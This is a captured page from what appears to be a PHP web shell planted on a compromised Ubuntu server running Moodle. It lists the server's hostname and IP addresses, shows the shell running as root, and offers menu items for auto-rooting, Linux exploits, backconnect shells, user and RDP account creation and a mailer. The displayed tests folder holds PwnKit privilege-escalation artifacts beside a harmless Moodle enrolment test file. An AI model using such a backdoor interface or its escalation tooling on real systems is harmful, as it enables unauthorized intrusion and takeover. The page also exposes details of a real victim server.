Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
enrol /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_to_group.feature
1.42
KB
-rwxrwxrwx
behat_enrol.php
4.34
KB
-rwxrwxrwx
enrol_user.feature
1013
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
role_visibility.feature
1.94
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enrol_user.feature
@enrol Feature: User can be enrolled into a course In order to let them participate in course activities As an admin I must be able to enrol users Background: Given the following "users" exist: | username | firstname | lastname | email | | student1 | Studie | One | student1@example.com | And the following "courses" exist: | fullname | shortname | | Course 001 | C001 | And I log in as "admin" And I am on "Course 001" course homepage Scenario: User can be enrolled without javascript When I enrol "Studie One" user as "Student" And I am on "Course 001" course homepage And I navigate to "Users > Enrolled users" in current page administration Then I should see "Studie One" @javascript Scenario: User can be enrolled with javascript enrol element When I enrol "Studie One" user as "Student" And I navigate to "Users > Enrolled users" in current page administration Then I should see "Studie One"
Close